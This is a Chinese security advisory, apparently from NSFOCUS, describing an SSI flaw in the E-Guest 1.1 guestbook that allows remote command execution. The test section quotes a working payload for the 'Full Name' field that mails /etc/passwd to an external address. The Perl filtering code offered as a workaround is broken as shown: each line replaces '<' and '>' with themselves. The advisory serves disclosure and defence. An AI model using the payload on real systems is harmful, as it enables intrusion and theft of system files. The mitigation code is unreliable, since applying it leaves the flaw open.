安全研究
安全漏洞
E-Guest服务器端包含可远程执行任意命令漏洞
发布日期:2002-06-30
更新日期:2002-07-09
受影响系统:
Leung Eric E-Guest 1.1
描述:
BUGTRAQ ID:
5129
E-Guest是一款免费开放源代码的留言版程序,可使用在Unix和Linux操作系统下。
E-Guest对用户提交到留言本名字的输入缺少正确的过滤,远程攻击者可以利用这个漏洞在目标系统上以E-Guest进程的权限执行任意命令。
E-Guest对用户提交给留言本名字"Full Name"字段的数据缺少正确检查,远程攻击者可以通过服务器端包含来提交SHELL命令,导致攻击者可以以E-Guest进程的权限在系统上执行任意命令。
<*来源:DownBload (
downbload@hotmail.com)
链接:
http://archives.neohapsis.com/archives/bugtraq/2002-06/0388.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
DownBload (
downbload@hotmail.com)提供了如下测试方法:
Full Name: HI<!--#exec cmd="/bin/mail
downbload@hotmail.com < /etc/passwd"-
->
E-mail:
downbload@hotmail.com
Homepage:
UIN:
Location: Beyond the light
Comment: Nothing special, just SSI attack.
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在E-Guest_sign.pl脚本中增加如下代码进行相关字符过滤:
...
$fullname =~ s/</</g;
$fullname =~ s/>/>/g;
$email =~ s/</</g;
$email =~ s/>/>/g;
$homepage =~ s/</</g;
$homepage =~ s/>/>/g;
$uin =~ s/</</g;
$uin =~ s/>/>/g;
$location =~ s/</</g;
$location =~ s/>/>/g;
...
厂商补丁:
Leung Eric
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://leungeric.com/
浏览次数:4759
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |